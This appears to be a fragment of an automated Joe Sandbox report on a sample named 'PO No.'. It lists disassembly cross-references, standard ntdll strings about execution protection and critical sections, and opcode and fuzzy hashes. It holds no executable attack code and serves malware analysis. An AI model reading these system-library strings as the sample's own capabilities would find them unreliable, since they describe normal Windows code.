                                                            • ExecuteOptions, xrefs: 010046A0
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010046FC
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01004725
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01004787
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction ID: 6b561a8eff516141215b1b992d8f0ce44d2e5b7ba18ef120711d6da4340ac50a
                                                            • Opcode Fuzzy Hash: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction Fuzzy Hash: F1514931A0431A6AEF21BAA4DD87FED77A8FF04310F14009DE609A71C1E7759E45AF51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: fb7fca438397dbaad376aef8f667f9a83dab5c3057d83f4734f495bedd64fd0c
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: E581CE31E05249DBDF249F68C8917FEBBA7AF85360F1E425BE861A7391C7348841EB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010002BD
                                                            • RTL: Re-Waiting, xrefs: 0100031E
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010002E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 010072C1
                                                            • RTL: Resource at %p, xrefs: 010072A3
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01007294
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280